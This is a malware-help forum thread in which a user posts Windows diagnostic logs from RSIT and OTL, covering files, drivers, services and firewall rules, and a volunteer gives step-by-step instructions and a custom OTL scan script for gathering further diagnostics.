.js - open - C:\Windows\System32\WScript.exe "%1" %*
.txt - open - C:\Windows\NOTEPAD.EXE %1

======List of files/folders created in the last 1 month======

2014-12-09 16:36:56 ----D---- C:\Program Files\trend micro
2014-12-09 16:36:55 ----D---- C:\rsit
2014-12-09 08:41:36 ----A---- C:\Windows\system32\drivers\kl1.sys
2014-12-09 08:41:34 ----DC---- C:\Windows\system32\DRVSTORE
2014-12-09 08:41:34 ----A---- C:\Windows\system32\drivers\klif.sys
2014-12-09 08:41:34 ----A---- C:\Windows\system32\drivers\klflt.sys
2014-12-09 08:11:58 ----A---- C:\Windows\system32\drivers\tcpip.sys
2014-12-09 08:11:58 ----A---- C:\Windows\system32\drivers\netio.sys
2014-12-09 07:50:59 ----A---- C:\Windows\system32\drivers\MBAMSwissArmy.sys
2014-12-09 07:50:37 ----D---- C:\ProgramData\Malwarebytes
2014-12-09 07:50:37 ----D---- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-12-09 07:50:37 ----A---- C:\Windows\system32\drivers\mwac.sys
2014-12-09 07:50:37 ----A---- C:\Windows\system32\drivers\mbamchameleon.sys
2014-12-09 07:50:37 ----A---- C:\Windows\system32\drivers\mbam.sys
2014-12-08 23:30:06 ----D---- C:\1470d06be47cb175c79779ff1f
2014-12-08 11:39:47 ----D---- C:\Program Files (x86)\Microsoft ASP.NET
2014-12-07 21:13:51 ----D---- C:\Program Files (x86)\MySQL
2014-12-07 12:42:04 ----D---- C:\Program Files\Microsoft SDKs
2014-12-07 12:40:29 ----D---- C:\ProgramData\PreEmptive Solutions
2014-12-06 16:39:55 ----D---- C:\Program Files (x86)\CE Remote Tools
2014-12-06 16:39:51 ----SHD---- C:\Config.Msi
2014-12-06 16:39:02 ----D---- C:\Program Files (x86)\Microsoft Web Designer Tools
2014-12-06 16:38:50 ----RHD---- C:\MSOCache
2014-12-06 10:37:25 ----D---- C:\Program Files (x86)\Check Point Software Technologies LTD
2014-12-06 10:36:53 ----D---- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD
2014-12-06 10:36:49 ----D---- C:\Program Files (x86)\CheckPoint
2014-12-06 10:34:43 ----D---- C:\ProgramData\CheckPoint
2014-11-28 21:49:14 ----D---- C:\KMPlayer
2014-11-27 08:31:52 ----D---- C:\Program Files (x86)\HTML Help Workshop
2014-11-27 08:31:33 ----D---- C:\Program Files (x86)\Microsoft Help Viewer
2014-11-27 08:31:02 ----D---- C:\Windows\SYSWOW64\1033
2014-11-27 08:25:53 ----D---- C:\Windows\system32\1033
2014-11-20 09:35:43 ----D---- C:\Program Files (x86)\Blaze Media Pro
2014-11-20 09:35:37 ----HDC---- C:\ProgramData\{784E3329-1B2A-421E-9427-596088B766F6}
2014-11-11 22:06:35 ----D---- C:\Windows\symbols
2014-11-11 22:06:32 ----D---- C:\Program Files\Microsoft Visual Studio 11.0
2014-11-11 18:36:42 ----D---- C:\Windows\SYSWOW64\bitstreams
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\zlib1.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\ssleay32.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\pthreadVC2.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\pthreadGC2.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\libssh2.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\librtmp.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\libidn-11.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\libeay32.dll
2014-11-11 18:36:42 ----AS---- C:\Windows\SYSWOW64\libcurl-4.dll
2014-11-11 18:36:41 ----AS---- C:\Windows\SYSWOW64\cudart32_50_35.dll
2014-11-11 14:44:36 ----D---- C:\ProgramData\regid.1991-06.com.microsoft
2014-11-11 14:44:36 ----D---- C:\ProgramData\Package Cache
2014-11-11 00:49:23 ----D---- C:\Program Files (x86)\Mozilla Firefox
2014-11-10 22:52:18 ----D---- C:\Users\Lobo\AppData\Roaming\e-academy Inc

======List of files/folders modified in the last 1 month======

2014-12-09 16:36:56 ----RD---- C:\Program Files
2014-12-09 16:36:56 ----D---- C:\Windows\Prefetch
2014-12-09 16:36:46 ----D---- C:\Windows\Temp
2014-12-09 15:33:01 ----D---- C:\QIP 2012
2014-12-09 13:52:36 ----D---- C:\Windows\system32\config
2014-12-09 13:47:42 ----D---- C:\Windows\System32
2014-12-09 13:47:41 ----D---- C:\Windows\inf
2014-12-09 13:47:41 ----A---- C:\Windows\system32\PerfStringBackup.INI
2014-12-09 13:41:29 ----D---- C:\ProgramData\NVIDIA
2014-12-09 08:41:46 ----SHD---- C:\System Volume Information
2014-12-09 08:41:36 ----D---- C:\Windows\system32\drivers
2014-12-09 08:41:36 ----D---- C:\Windows\system32\catroot
2014-12-09 08:41:24 ----SHD---- C:\Windows\Installer
2014-12-09 08:37:40 ----D---- C:\Windows\winsxs
2014-12-09 08:37:24 ----D---- C:\Windows\system32\drivers\etc
2014-12-09 08:12:16 ----D---- C:\Windows\system32\DriverStore
2014-12-09 08:12:01 ----D---- C:\Windows
2014-12-09 08:11:43 ----D---- C:\Program Files\Common Files\Microsoft Shared
2014-12-09 08:10:30 ----D---- C:\Windows\SHELLNEW
2014-12-09 08:08:47 ----D---- C:\Windows\SysWOW64
2014-12-09 07:50:37 ----RD---- C:\Program Files (x86)
2014-12-09 07:50:37 ----HD---- C:\ProgramData
2014-12-08 12:43:16 ----D---- C:\Windows\Microsoft.NET
2014-12-08 11:39:54 ----RSD---- C:\Windows\assembly
2014-12-07 21:13:55 ----A---- C:\Windows\SYSWOW64\PerfStringBackup.INI
2014-12-07 12:42:01 ----D---- C:\Program Files\Microsoft Visual Studio 9.0
2014-12-07 12:41:48 ----D---- C:\ProgramData\Microsoft Help
2014-12-07 12:39:18 ----D---- C:\Program Files (x86)\MSBuild
2014-12-07 12:39:16 ----RSD---- C:\Windows\Fonts
2014-12-01 08:32:13 ----D---- C:\Windows\Minidump
2014-11-27 08:31:29 ----SD---- C:\ProgramData\Microsoft
2014-11-27 08:31:29 ----D---- C:\Program Files (x86)\Microsoft SDKs
2014-11-27 08:30:55 ----D---- C:\Program Files\Microsoft SQL Server
2014-11-27 08:30:54 ----D---- C:\Program Files (x86)\Microsoft SQL Server
2014-11-26 22:35:10 ----D---- C:\Users\Lobo\AppData\Roaming\TS3Client
2014-11-26 14:14:24 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2014-11-26 10:02:05 ----D---- C:\Windows\SYSWOW64\cs-CZ
2014-11-26 10:02:05 ----D---- C:\Windows\system32\cs-CZ
2014-11-26 10:00:19 ----D---- C:\Windows\SYSWOW64\en-US
2014-11-26 10:00:19 ----D---- C:\Windows\system32\en-US
2014-11-24 12:36:58 ----D---- C:\Windows\system32\catroot2
2014-11-20 09:50:49 ----SD---- C:\Users\Lobo\AppData\Roaming\Microsoft
2014-11-11 22:07:05 ----D---- C:\Program Files (x86)\Common Files
2014-11-11 21:10:00 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2014-11-11 14:35:56 ----A---- C:\Windows\system32\msvcsv60.dll
2014-11-11 14:35:56 ----A---- C:\Users\Lobo\AppData\Roaming\msregsvv.dll
2014-11-11 13:54:22 ----D---- C:\Program Files (x86)\Microsoft Visual Studio 9.0

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 epfwwfp;epfwwfp; C:\Windows\system32\DRIVERS\epfwwfp.sys [2013-02-14 58416]
R0 KL1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2014-06-11 7717984]
R0 pciide;pciide; C:\Windows\system32\DRIVERS\pciide.sys [2009-07-14 12352]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2009-07-14 214096]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2009-07-14 514048]
R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver; C:\Windows\system32\DRIVERS\dtsoftbus01.sys [2013-04-26 283200]
R1 eamonm;eamonm; C:\Windows\system32\DRIVERS\eamonm.sys [2013-02-14 213416]
R1 ehdrv;ehdrv; C:\Windows\system32\DRIVERS\ehdrv.sys [2013-01-10 150616]
R1 EpfwLWF;Epfw NDIS LightWeight Filter; C:\Windows\system32\DRIVERS\EpfwLWF.sys [2013-01-10 59440]
R1 KLIF;Kaspersky Lab Driver; C:\Windows\system32\DRIVERS\klif.sys [2014-06-11 490592]
R1 Vsdatant;Zone Alarm Firewall Driver; C:\Windows\system32\DRIVERS\vsdatant.sys [2014-08-13 450456]
R2 epfw;epfw; C:\Windows\system32\DRIVERS\epfw.sys [2013-01-10 190232]
R3 CVPNDRVA;Cisco Systems Inc. IPSec Driver; \??\C:\Windows\system32\Drivers\CVPNDRVA.sys [2011-03-04 306536]
R3 DNE;Deterministic Network Enhancer Miniport; C:\Windows\system32\DRIVERS\dne64x.sys [2008-11-16 157968]
R3 gdrv;gdrv; \??\C:\Windows\gdrv.sys [2014-12-09 25640]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHD64.sys [2010-04-06 2337440]
R3 MBAMProtector;MBAMProtector; \??\C:\Windows\system32\drivers\mbam.sys [2014-11-21 25816]
R3 MBAMSwissArmy;MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [2014-12-09 129752]
R3 MBAMWebAccessControl;MBAMWebAccessControl; \??\C:\Windows\system32\drivers\mwac.sys [2014-11-21 63704]
R3 NVHDA;Service for NVIDIA High Definition Audio Driver; C:\Windows\system32\drivers\nvhda64v.sys [2012-12-19 194488]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2010-03-22 347680]
S3 CVirtA;Cisco Systems VPN Adapter for 64-bit Windows; C:\Windows\system32\DRIVERS\CVirtA64.sys [2010-02-08 14992]
S3 GVTDrv64;GVTDrv64; \??\C:\Windows\GVTDrv64.sys [2013-04-19 30528]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2009-07-14 165376]
S3 usbscan;Ovladač skeneru USB; C:\Windows\system32\DRIVERS\usbscan.sys [2009-07-14 41984]
S3 WinRing0_1_2_0;WinRing0_1_2_0; \??\C:\Program Files (x86)\Razer\Razer Game Booster\Driver\WinRing0x64.sys [2012-08-01 14544]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 aaLogger;ArchestrA Logger; C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe [2007-07-18 229446]
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2014-09-12 64704]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2009-07-14 27136]
R2 CVPND;Cisco Systems, Inc. VPN Service; C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe [2011-03-04 1529856]
R2 DragonUpdater;COMODO Dragon Update Service; C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe [2014-05-27 2139328]
R2 ekrn;ESET Service; C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe [2013-03-21 1341664]
R2 ES lite Service;ES lite Service for program management.; C:\Program Files (x86)\Gigabyte\EasySaver\ESSVR.EXE [2009-08-24 68136]
R2 FS Service Control;FS Service Control; C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe [2005-01-12 32845]
R2 MBAMService;MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-11-21 969016]
R2 MBAMScheduler;MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-11-21 1871160]
R2 MSSQL$SQLEXPRESS;SQL Server (SQLEXPRESS); C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [2007-02-10 29178224]
R2 NMSAccess;NMSAccess; C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe [2009-01-12 71096]
R2 nvsvc;NVIDIA Display Driver Service; C:\Windows\system32\nvvsvc.exe [2013-03-15 877856]
R2 nvUpdatusService;NVIDIA Update Service Daemon; C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe [2013-03-15 1266464]
R2 PDF Architect Helper Service;PDF Architect Helper Service; C:\Program Files (x86)\PDF Architect\HelperService.exe [2014-01-23 1335344]
R2 PDF Architect Service;PDF Architect Service; C:\Program Files (x86)\PDF Architect\ConversionService.exe [2014-01-23 856112]
R2 slssvc;Wonderware SuiteLink; C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe [2005-05-05 40960]
R2 SQLWriter;SQL Server VSS Writer; C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe [2007-02-10 156016]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service; C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2013-03-14 383264]
R2 TeamViewer9;TeamViewer 9; C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe [2013-12-17 5341536]
R2 vsmon;TrueVector Internet Monitor; C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe [2014-08-13 3596752]
R2 ZAPrivacyService;ZoneAlarm Privacy Service; C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZaPrivacyService.exe [2014-08-13 96272]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2012-07-09 104912]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2012-07-08 123856]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc []
S2 SkypeUpdate;Skype Updater; C:\Program Files (x86)\Skype\Updater\Updater.exe [2014-04-03 315008]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-26 267440]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2009-07-14 27136]
S3 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2012-07-08 51648]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc []
S3 IDriverT;InstallDriver Table Manager; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [2005-04-03 69632]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2014-11-11 114288]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 Steam Client Service;Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [2014-10-21 833728]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 27136]
S3 WWNetDDE;Wonderware NetDDE Helper; C:\Program Files (x86)\Common Files\ArchestrA\wwnetdde.exe [2007-07-18 80688]
S4 MSSQLServerADHelper;SQL Server Active Directory Helper; C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqladhlp90.exe [2005-10-14 45272]
S4 msvsmon90;Visual Studio 2008 Remote Debugger; C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe [2007-11-07 4466688]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2012-07-09 139680]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2012-07-09 139680]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2012-07-09 139680]
S4 SQLBrowser;SQL Server Browser; C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe [2007-02-10 242544]

-----------------EOF-----------------

vyosek
VIP
Posts: 56373
Registered: 07 Nov 2006 15:24
Location: Šalingrad - Brno

Re: Malware - please check my log

#2 Post by vyosek »

Hello :)

Download OTL from http://oldtimer.geekstogo.com/OTL.exe and save it to your desktop
  • If you use Windows Vista or Windows 7, right-click OTL and choose Run As Administrator
  • If you use a 64-bit OS, check whether the box For 64-bit OS is ticked; if not, tick it
  • Tick the box For all users
  • Tick the box "LOP" check
  • Tick the box "Purity" check
  • Change the file age from 30 days to 7 days
  • Paste the script below into the bottom box, Custom scans/fixes
  • Code:

    CREATERESTOREPOINT
    
    netsvcs
    drivers32
    savembr:0
    
    /md5start
    atapi.sys
    autochk.exe
    cdrom.sys
    explorer.exe
    hal.dll
    scecli.dll
    services.exe
    svchost.exe
    tcpip.sys
    userinit.exe
    winlogon.exe
    /md5stop
    
    %systemroot%*.* /U /s
    %SYSTEMDRIVE%\*.exe
    %ALLUSERSPROFILE%\Application Data\*.
    %ALLUSERSPROFILE%\Application Data\*.exe /s
    %APPDATA%\*.
    %APPDATA%\*.exe /s
    %systemroot%\*. /mp /s
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\Tasks\*.job
    %systemroot%\system32\drivers\*.sys /lockedfiles
    %systemroot%\System32\config\*.sav
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\system32\drivers\*.sys /3
    %systemroot%\system32\*.* /3
    %SYSTEMDRIVE%\*.exe
    
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s
    
    %PROGRAMFILES%\Mozilla Firefox\firefox.exe /md5
    %PROGRAMFILES%\Internet Explorer\iexplore.exe /md5
    %PROGRAMFILES%\Opera\opera.exe /md5
    %PROGRAMFILES%\Google\Chrome\Application\chrome.exe /md5
    
    %SystemDrive%\PhysicalMBR.bin /md5 
    
    *crack* /s
    *keygen* /s
    *loader* /s
  • Click the Scan button
  • When the scan finishes (about 10 to 15 minutes), the logs OTL.txt and Extras.txt will appear; paste both here
  • If the logs are long (the forum will complain that the maximum number of characters was exceeded), split them across several posts
"He who has wine and does not drink, who has grapes and does not eat them, who has a wife and does not kiss her, who shuns amusement, take a whip and a stick to him; that is no man, that is an ox."
Member of [image] since 1 February 2011.

chvostik
Visitor
Posts: 31
Registered: 04 Apr 2008 17:37

Re: Malware - please check my log

#3 Post by chvostik »

OTL Extras logfile created on: 9.12.2014 17:34:27 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Lobo\Desktop
64bit- Ultimate Edition (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.7600.16385)
Locale: 00000405 | Country: Česká republika | Language: CSY | Date Format: d.M.yyyy

4,00 Gb Total Physical Memory | 2,14 Gb Available Physical Memory | 53,53% Memory free
7,99 Gb Paging File | 4,61 Gb Available in Paging File | 57,73% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 55,89 Gb Total Space | 9,14 Gb Free Space | 16,35% Space Free | Partition Type: NTFS
Drive D: | 1863,01 Gb Total Space | 848,85 Gb Free Space | 45,56% Space Free | Partition Type: NTFS
Drive E: | 465,75 Gb Total Space | 23,48 Gb Free Space | 5,04% Space Free | Partition Type: NTFS
Drive F: | 74,52 Gb Total Space | 5,05 Gb Free Space | 6,77% Space Free | Partition Type: NTFS
Drive G: | 2,92 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: UDF
Drive H: | 3,31 Gb Total Space | 0,00 Gb Free Space | 0,00% Space Free | Partition Type: UDF

Computer Name: LOBO-PC | User Name: Lobo | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 7 Days

========== Extra Registry (SafeList) ==========


========== File Associations ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
.txt[@ = txtfile] -- C:\Windows\NOTEPAD.EXE (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.txt [@ = txtfile] -- C:\Windows\NOTEPAD.EXE (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)

========== Shell Spawning ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- C:\Windows\NOTEPAD.EXE %1 (Microsoft Corporation)
Unknown [openas] -- "C:\Program Files (x86)\Smart File Advisor\sfa.exe" /unknown "%1"
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- C:\Windows\NOTEPAD.EXE %1 (Microsoft Corporation)
Unknown [openas] -- "C:\Program Files (x86)\Smart File Advisor\sfa.exe" /unknown "%1"
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0

========== Authorized Applications List ==========


========== Vista Active Open Ports Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{36B0ABEC-C4F4-422D-B012-B4408F641A18}" = rport=139 | protocol=6 | dir=out | app=system |
"{46E58CD5-6D4B-4A68-85BE-577212F19D69}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{69FC7271-A619-4FE9-BE91-81F827C42E37}" = rport=137 | protocol=17 | dir=out | app=system |
"{6E93A67E-A11C-4039-A83F-BD7F72928EC2}" = lport=3702 | protocol=17 | dir=in | app=d:\dreamspark\microsoft visual studio 11.0\common7\ide\devenv.exe |
"{713F7422-E651-40B9-876F-60D652F0AE13}" = rport=138 | protocol=17 | dir=out | app=system |
"{7534E2A6-6E5F-4DBA-8DA1-ECA2ED7514ED}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{8B5EA31A-0C9E-424C-9E86-BF307CF67C7F}" = lport=139 | protocol=6 | dir=in | app=system |
"{907D502B-5F5B-47D6-B875-20B7C70AAF86}" = lport=137 | protocol=17 | dir=in | app=system |
"{C1D034E7-01DF-441E-9B49-81F09F15057F}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{C54CFE1B-3A4B-4461-99C8-14B864669565}" = lport=138 | protocol=17 | dir=in | app=system |
"{EE3F355D-0CF7-4D39-BA33-BC09F0DA3AA7}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |
"{F8C2F86A-4B2A-462A-9D8B-558584496671}" = rport=445 | protocol=6 | dir=out | app=system |
"{F90496E9-BA24-494B-B0B5-6A4ADECDEAC5}" = lport=445 | protocol=6 | dir=in | app=system |
"{FCB99043-852A-4466-BC17-1D6F33DF4046}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{00AA119E-1519-4C21-BCC9-06D8F90A90F1}" = protocol=17 | dir=in | app=c:\program files (x86)\checkpoint\zonealarm\vsmon.exe |
"{069A36C9-E536-4E52-B3B3-87AA3C96079D}" = protocol=6 | dir=in | app=d:\steam\steam.exe |
"{0FC3248A-78D6-4955-979E-F46760AD8ADB}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{145D3373-E20B-46F1-93E6-C636DE7E38B2}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp_launcher.exe |
"{147B3DC1-4F25-4F5D-B15F-E64DF48898AC}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{15478B22-4721-4C2B-9445-07A84ED60B8C}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{17F35F6E-30FB-458A-8987-789B34B483A5}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{1E03210C-F5C7-4F71-BE39-3DD2F6696C4A}" = protocol=1 | dir=in | name=archestra icmp |
"{202A875D-94ED-438D-A04C-B7E42736B888}" = protocol=17 | dir=in | app=d:\steam\steam.exe |
"{22484E0F-09BF-4D3E-952F-B9AE5A60631D}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{2304AE01-46AC-4E0A-9EA0-97A394DDF987}" = protocol=6 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer_service.exe |
"{27AF93CF-4787-4257-B5B5-E1F136F1BF5C}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{28C835B8-27BB-467F-AC08-3404D7ED5E6D}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{2A42FF27-FFEA-4562-907F-C5F681F07311}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{34296008-F22A-4D1A-B9BE-994BB32F7AA0}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\rocksmith\rocksmith.exe |
